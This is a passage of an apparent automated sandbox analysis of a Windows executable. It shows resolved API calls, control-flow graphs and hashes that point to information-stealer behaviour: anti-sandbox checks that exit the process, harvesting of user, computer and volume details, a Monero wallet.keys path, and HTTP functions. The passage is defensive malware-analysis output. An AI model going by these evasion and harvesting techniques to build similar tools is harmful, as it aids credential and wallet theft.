                        • GetProcAddress.KERNEL32(74DD0000,0115CF48), ref: 005F9ED6
                        • GetProcAddress.KERNEL32(74DD0000,0115D0E0), ref: 005F9EEF
                        • GetProcAddress.KERNEL32(74DD0000,0115CFA8), ref: 005F9F07
                        • GetProcAddress.KERNEL32(74DD0000,0115CF18), ref: 005F9F1F
                        • GetProcAddress.KERNEL32(74DD0000,0115CED0), ref: 005F9F38
                        • GetProcAddress.KERNEL32(74DD0000,0115A960), ref: 005F9F50
                        • GetProcAddress.KERNEL32(74DD0000,0115CE70), ref: 005F9F68
                        • GetProcAddress.KERNEL32(74DD0000,0115CFF0), ref: 005F9F81
                        • GetProcAddress.KERNEL32(74DD0000,01145C10), ref: 005F9F99
                        • GetProcAddress.KERNEL32(74DD0000,0115CEE8), ref: 005F9FB1
                        • GetProcAddress.KERNEL32(74DD0000,011456D0), ref: 005F9FCA
                        • GetProcAddress.KERNEL32(74DD0000,0115CE10), ref: 005F9FE2
                        • GetProcAddress.KERNEL32(74DD0000,0115CDF8), ref: 005F9FFA
                        • GetProcAddress.KERNEL32(74DD0000,01145770), ref: 005FA013
                        • GetProcAddress.KERNEL32(74DD0000,01145A90), ref: 005FA02B
                        • LoadLibraryA.KERNEL32(0115CF00,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA03D
                        • LoadLibraryA.KERNEL32(0115CFC0,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA04E
                        • LoadLibraryA.KERNEL32(0115CF30,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA060
                        • LoadLibraryA.KERNEL32(0115CF60,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA072
                        • LoadLibraryA.KERNEL32(0115CF78,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA083
                        • LoadLibraryA.KERNEL32(0115CE28,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA095
                        • LoadLibraryA.KERNEL32(0115CE40,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA0A7
                        • LoadLibraryA.KERNEL32(0115CFD8,?,005F5CA3,00600AEB,?,?,?,?,?,?,?,?,?,?,00600AEA,00600AE3), ref: 005FA0B8
                        • GetProcAddress.KERNEL32(75290000,011456F0), ref: 005FA0DA
                        • GetProcAddress.KERNEL32(75290000,0115D2F0), ref: 005FA0F2
                        • GetProcAddress.KERNEL32(75290000,011590D8), ref: 005FA10A
                        • GetProcAddress.KERNEL32(75290000,0115D110), ref: 005FA123
                        • GetProcAddress.KERNEL32(75290000,01145790), ref: 005FA13B
                        • GetProcAddress.KERNEL32(73440000,0114B680), ref: 005FA160
                        • GetProcAddress.KERNEL32(73440000,011459D0), ref: 005FA179
                        • GetProcAddress.KERNEL32(73440000,0114B720), ref: 005FA191
                        • GetProcAddress.KERNEL32(73440000,0115D260), ref: 005FA1A9
                        • GetProcAddress.KERNEL32(73440000,0115D248), ref: 005FA1C2
                        • GetProcAddress.KERNEL32(73440000,01145730), ref: 005FA1DA
                        • GetProcAddress.KERNEL32(73440000,01145970), ref: 005FA1F2
                        • GetProcAddress.KERNEL32(73440000,0115D338), ref: 005FA20B
                        • GetProcAddress.KERNEL32(752C0000,011459B0), ref: 005FA22C
                        • GetProcAddress.KERNEL32(752C0000,01145A10), ref: 005FA244
                        • GetProcAddress.KERNEL32(752C0000,0115D278), ref: 005FA25D
                        • GetProcAddress.KERNEL32(752C0000,0115D290), ref: 005FA275
                        • GetProcAddress.KERNEL32(752C0000,01145990), ref: 005FA28D
                        • GetProcAddress.KERNEL32(74EC0000,0114B7C0), ref: 005FA2B3
                        • GetProcAddress.KERNEL32(74EC0000,0114B770), ref: 005FA2CB
                        • GetProcAddress.KERNEL32(74EC0000,0115D1A0), ref: 005FA2E3
                        • GetProcAddress.KERNEL32(74EC0000,01145890), ref: 005FA2FC
                        • GetProcAddress.KERNEL32(74EC0000,011459F0), ref: 005FA314
                        • GetProcAddress.KERNEL32(74EC0000,0114B978), ref: 005FA32C
                        • GetProcAddress.KERNEL32(75BD0000,0115D1D0), ref: 005FA352
                        • GetProcAddress.KERNEL32(75BD0000,01145A30), ref: 005FA36A
                        • GetProcAddress.KERNEL32(75BD0000,01158F58), ref: 005FA382
                        • GetProcAddress.KERNEL32(75BD0000,0115D140), ref: 005FA39B
                        • GetProcAddress.KERNEL32(75BD0000,0115D200), ref: 005FA3B3
                        • GetProcAddress.KERNEL32(75BD0000,011458B0), ref: 005FA3CB
                        • GetProcAddress.KERNEL32(75BD0000,011456B0), ref: 005FA3E4
                        • GetProcAddress.KERNEL32(75BD0000,0115D2A8), ref: 005FA3FC
                        • GetProcAddress.KERNEL32(75BD0000,0115D1E8), ref: 005FA414
                        • GetProcAddress.KERNEL32(75A70000,011457D0), ref: 005FA436
                        • GetProcAddress.KERNEL32(75A70000,0115D1B8), ref: 005FA44E
                        • GetProcAddress.KERNEL32(75A70000,0115D3C8), ref: 005FA466
                        • GetProcAddress.KERNEL32(75A70000,0115D218), ref: 005FA47F
                        • GetProcAddress.KERNEL32(75A70000,0115D230), ref: 005FA497
                        • GetProcAddress.KERNEL32(75450000,011457B0), ref: 005FA4B8
                        • GetProcAddress.KERNEL32(75450000,01145850), ref: 005FA4D1
                        • GetProcAddress.KERNEL32(75DA0000,011457F0), ref: 005FA4F2
                        • GetProcAddress.KERNEL32(75DA0000,0115D2C0), ref: 005FA50A
                        • GetProcAddress.KERNEL32(6F070000,01145A50), ref: 005FA530
                        • GetProcAddress.KERNEL32(6F070000,01145A70), ref: 005FA548
                        • GetProcAddress.KERNEL32(6F070000,01145870), ref: 005FA560
                        • GetProcAddress.KERNEL32(6F070000,0115D170), ref: 005FA579
                        • GetProcAddress.KERNEL32(6F070000,01145810), ref: 005FA591
                        • GetProcAddress.KERNEL32(6F070000,01145710), ref: 005FA5A9
                        • GetProcAddress.KERNEL32(6F070000,011458D0), ref: 005FA5C2
                        • GetProcAddress.KERNEL32(6F070000,01145750), ref: 005FA5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 005FA5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 005FA607
                        • GetProcAddress.KERNEL32(75AF0000,0115D128), ref: 005FA629
                        • GetProcAddress.KERNEL32(75AF0000,01159028), ref: 005FA641
                        • GetProcAddress.KERNEL32(75AF0000,0115D350), ref: 005FA659
                        • GetProcAddress.KERNEL32(75AF0000,0115D2D8), ref: 005FA672
                        • GetProcAddress.KERNEL32(75D90000,011458F0), ref: 005FA693
                        • GetProcAddress.KERNEL32(6E340000,0115D0F8), ref: 005FA6B4
                        • GetProcAddress.KERNEL32(6E340000,01145830), ref: 005FA6CD
                        • GetProcAddress.KERNEL32(6E340000,0115D308), ref: 005FA6E5
                        • GetProcAddress.KERNEL32(6E340000,0115D380), ref: 005FA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 4b9504b6d634eca670a59bb8f77a8ebe7f51b373478110d915de9a9f9b324770
                        • Instruction ID: 143c67517e88da9b3d08bce2ffe60690d999bb1435dac291097a259cb437c0d4
                        • Opcode Fuzzy Hash: 4b9504b6d634eca670a59bb8f77a8ebe7f51b373478110d915de9a9f9b324770
                        • Instruction Fuzzy Hash: F9620BB5500204AFC36CDFA8EE889663BF9FF4C701754C52AE649C3264D7399843DB6A
                        Function 005F5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 858 5f5510-5f5577 call 5f5ad0 call 5fa820 * 3 call 5fa740 * 4 874 5f557c-5f5583 858->874 875 5f55d7-5f564c call 5fa740 * 2 call 5e1590 call 5f52c0 call 5fa8a0 call 5fa800 call 5faad0 StrCmpCA 874->875 876 5f5585-5f55b6 call 5fa820 call 5fa7a0 call 5e1590 call 5f51f0 874->876 902 5f5693-5f56a9 call 5faad0 StrCmpCA 875->902 906 5f564e-5f568e call 5fa7a0 call 5e1590 call 5f51f0 call 5fa8a0 call 5fa800 875->906 892 5f55bb-5f55d2 call 5fa8a0 call 5fa800 876->892 892->902 907 5f56af-5f56b6 902->907 908 5f57dc-5f5844 call 5fa8a0 call 5fa820 * 2 call 5e1670 call 5fa800 * 4 call 5f6560 call 5e1550 902->908 906->902 911 5f56bc-5f56c3 907->911 912 5f57da-5f585f call 5faad0 StrCmpCA 907->912 1038 5f5ac3-5f5ac6 908->1038 916 5f571e-5f5793 call 5fa740 * 2 call 5e1590 call 5f52c0 call 5fa8a0 call 5fa800 call 5faad0 StrCmpCA 911->916 917 5f56c5-5f5719 call 5fa820 call 5fa7a0 call 5e1590 call 5f51f0 call 5fa8a0 call 5fa800 911->917 931 5f5865-5f586c 912->931 932 5f5991-5f59f9 call 5fa8a0 call 5fa820 * 2 call 5e1670 call 5fa800 * 4 call 5f6560 call 5e1550 912->932 916->912 1017 5f5795-5f57d5 call 5fa7a0 call 5e1590 call 5f51f0 call 5fa8a0 call 5fa800 916->1017 917->912 938 5f598f-5f5a14 call 5faad0 StrCmpCA 931->938 939 5f5872-5f5879 931->939 932->1038 967 5f5a28-5f5a91 call 5fa8a0 call 5fa820 * 2 call 5e1670 call 5fa800 * 4 call 5f6560 call 5e1550 938->967 968 5f5a16-5f5a21 Sleep 938->968 946 5f587b-5f58ce call 5fa820 call 5fa7a0 call 5e1590 call 5f51f0 call 5fa8a0 call 5fa800 939->946 947 5f58d3-5f5948 call 5fa740 * 2 call 5e1590 call 5f52c0 call 5fa8a0 call 5fa800 call 5faad0 StrCmpCA 939->947 946->938 947->938 1043 5f594a-5f598a call 5fa7a0 call 5e1590 call 5f51f0 call 5fa8a0 call 5fa800 947->1043 967->1038 968->874 1017->912 1043->938
                        APIs
                          • Part of subcall function 005FA820: lstrlen.KERNEL32(005E4F05,?,?,005E4F05,00600DDE), ref: 005FA82B
                          • Part of subcall function 005FA820: lstrcpy.KERNEL32(00600DDE,00000000), ref: 005FA885
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F56A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5857
                          • Part of subcall function 005FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005FA7E6
                          • Part of subcall function 005F51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5228
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                          • Part of subcall function 005F52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5318
                          • Part of subcall function 005F52C0: lstrlen.KERNEL32(00000000), ref: 005F532F
                          • Part of subcall function 005F52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 005F5364
                          • Part of subcall function 005F52C0: lstrlen.KERNEL32(00000000), ref: 005F5383
                          • Part of subcall function 005F52C0: lstrlen.KERNEL32(00000000), ref: 005F53AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005F5940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005F5A0C
                        • Sleep.KERNEL32(0000EA60), ref: 005F5A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: b862e6108ccaf7ae2bb9803a74f42be1874d6aa757f99fa394513e76fc4e459c
                        • Instruction ID: c24df190534199874ba526d4dfc00be1339227c3f10b707d2a7883afc7721dd3
                        • Opcode Fuzzy Hash: b862e6108ccaf7ae2bb9803a74f42be1874d6aa757f99fa394513e76fc4e459c
                        • Instruction Fuzzy Hash: 1AE143B191010D9BCB18FBB0DD5ADFD7B78BF94340F408528B64A56095EF786A0ACB93
                        Function 005F17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1069 5f17a0-5f17cd call 5faad0 StrCmpCA 1072 5f17cf-5f17d1 ExitProcess 1069->1072 1073 5f17d7-5f17f1 call 5faad0 1069->1073 1077 5f17f4-5f17f8 1073->1077 1078 5f17fe-5f1811 1077->1078 1079 5f19c2-5f19cd call 5fa800 1077->1079 1081 5f199e-5f19bd 1078->1081 1082 5f1817-5f181a 1078->1082 1081->1077 1084 5f187f-5f1890 StrCmpCA 1082->1084 1085 5f185d-5f186e StrCmpCA 1082->1085 1086 5f1835-5f1844 call 5fa820 1082->1086 1087 5f1913-5f1924 StrCmpCA 1082->1087 1088 5f1932-5f1943 StrCmpCA 1082->1088 1089 5f18f1-5f1902 StrCmpCA 1082->1089 1090 5f1951-5f1962 StrCmpCA 1082->1090 1091 5f1970-5f1981 StrCmpCA 1082->1091 1092 5f18cf-5f18e0 StrCmpCA 1082->1092 1093 5f198f-5f1999 call 5fa820 1082->1093 1094 5f18ad-5f18be StrCmpCA 1082->1094 1095 5f1849-5f1858 call 5fa820 1082->1095 1096 5f1821-5f1830 call 5fa820 1082->1096 1116 5f189e-5f18a1 1084->1116 1117 5f1892-5f189c 1084->1117 1114 5f187a 1085->1114 1115 5f1870-5f1873 1085->1115 1086->1081 1101 5f1926-5f1929 1087->1101 1102 5f1930 1087->1102 1103 5f194f 1088->1103 1104 5f1945-5f1948 1088->1104 1099 5f190e 1089->1099 1100 5f1904-5f1907 1089->1100 1105 5f196e 1090->1105 1106 5f1964-5f1967 1090->1106 1108 5f198d 1091->1108 1109 5f1983-5f1986 1091->1109 1097 5f18ec 1092->1097 1098 5f18e2-5f18e5 1092->1098 1093->1081 1118 5f18ca 1094->1118 1119 5f18c0-5f18c3 1094->1119 1095->1081 1096->1081 1097->1081 1098->1097 1099->1081 1100->1099 1101->1102 1102->1081 1103->1081 1104->1103 1105->1081 1106->1105 1108->1081 1109->1108 1114->1081 1115->1114 1123 5f18a8 1116->1123 1117->1123 1118->1081 1119->1118 1123->1081
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 005F17C5
                        • ExitProcess.KERNEL32 ref: 005F17D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: c325f8ccd1ea5e6299e9f6329aedf748b8895250982b6e5165dd3ae8f9ae5885
                        • Instruction ID: d9f6fa133a04dcbd9b851a821600c535e49ce4ff740f871af6b1d18ffec41d29
                        • Opcode Fuzzy Hash: c325f8ccd1ea5e6299e9f6329aedf748b8895250982b6e5165dd3ae8f9ae5885
                        • Instruction Fuzzy Hash: 6B5176B4A0020EEFDB04DFA0DA94BBE7BB6BF44704F108458E60667380D7B8D951DB66
                        Function 005F7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1124 5f7500-5f754a GetWindowsDirectoryA 1125 5f754c 1124->1125 1126 5f7553-5f75c7 GetVolumeInformationA call 5f8d00 * 3 1124->1126 1125->1126 1133 5f75d8-5f75df 1126->1133 1134 5f75fc-5f7617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 5f75e1-5f75fa call 5f8d00 1133->1135 1137 5f7619-5f7626 call 5fa740 1134->1137 1138 5f7628-5f7658 wsprintfA call 5fa740 1134->1138 1135->1133 1145 5f767e-5f768e 1137->1145 1138->1145
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 005F7542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005F757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005F760A
                        • wsprintfA.USER32 ref: 005F7640
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699645348.0000000000AE2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699752146.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699765423.0000000000C84000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5e0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\$`
                        • API String ID: 1544550907-3750816455
                        • Opcode ID: 13bccd3340454e7e440e935899ab6ab1aa829ab839dbb55129f8d8582652bc45
                        • Instruction ID: 3caf61fcd2ac74768085da14d828a8e6e267601e15d0e205b56d734cbb72a867
                        • Opcode Fuzzy Hash: 13bccd3340454e7e440e935899ab6ab1aa829ab839dbb55129f8d8582652bc45
                        • Instruction Fuzzy Hash: 0C4181B1D0424CABDF10DF94DC45BEEBBB8BF58700F104098F609A7280DB78AA44CBA5
                        Function 005F69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152398), ref: 005F98A1
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011523B0), ref: 005F98BA
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011523C8), ref: 005F98D2
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011524E8), ref: 005F98EA
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152500), ref: 005F9903
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,011590C8), ref: 005F991B
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01145CD0), ref: 005F9933
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01145BB0), ref: 005F994C
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152248), ref: 005F9964
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152260), ref: 005F997C
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152278), ref: 005F9995
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152428), ref: 005F99AD
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01145D90), ref: 005F99C5
                          • Part of subcall function 005F9860: GetProcAddress.KERNEL32(74DD0000,01152440), ref: 005F99DE
                          • Part of subcall function 005FA740: lstrcpy.KERNEL32(00600E17,00000000), ref: 005FA788
                          • Part of subcall function 005E11D0: ExitProcess.KERNEL32 ref: 005E1211
                          • Part of subcall function 005E1160: GetSystemInfo.KERNEL32(?), ref: 005E116A
                          • Part of subcall function 005E1160: ExitProcess.KERNEL32 ref: 005E117E
                          • Part of subcall function 005E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 005E112B
                          • Part of subcall function 005E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 005E1132
                          • Part of subcall function 005E1110: ExitProcess.KERNEL32 ref: 005E1143
                          • Part of subcall function 005E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 005E123E
                          • Part of subcall function 005E1220: __aulldiv.LIBCMT ref: 005E1258
                          • Part of subcall function 005E1220: __aulldiv.LIBCMT ref: 005E1266
                          • Part of subcall function 005E1220: ExitProcess.KERNEL32 ref: 005E1294
                          • Part of subcall function 005F6770: GetUserDefaultLangID.KERNEL32 ref: 005F6774
                          • Part of subcall function 005E1190: ExitProcess.KERNEL32 ref: 005E11C6
                          • Part of subcall function 005F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005E11B7), ref: 005F7880
                          • Part of subcall function 005F7850: RtlAllocateHeap.NTDLL(00000000), ref: 005F7887
                          • Part of subcall function 005F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 005F789F
                          • Part of subcall function 005F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F7910
                          • Part of subcall function 005F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 005F7917
                          • Part of subcall function 005F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 005F792F
                          • Part of subcall function 005FA9B0: lstrlen.KERNEL32(?,011591F8,?,\Monero\wallet.keys,00600E17), ref: 005FA9C5
                          • Part of subcall function 005FA9B0: lstrcpy.KERNEL32(00000000), ref: 005FAA04
                          • Part of subcall function 005FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005FAA12
                          • Part of subcall function 005FA8A0: lstrcpy.KERNEL32(?,00600E17), ref: 005FA905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 005F6AE8
                        • CloseHandle.KERNEL32(00000000), ref: 005F6AF9
                        • Sleep.KERNEL32(00001770), ref: 005F6B04
                        • CloseHandle.KERNEL32(?,00000000,?,01159098,?,0060110C,?,00000000,?,00601110,?,00000000,00600AEF), ref: 005F6B1A
                        • ExitProcess.KERNEL32 ref: 005F6B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                        • Associated: 00000000.00000002.1699262744.00000000005E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699280590.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1699420038.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
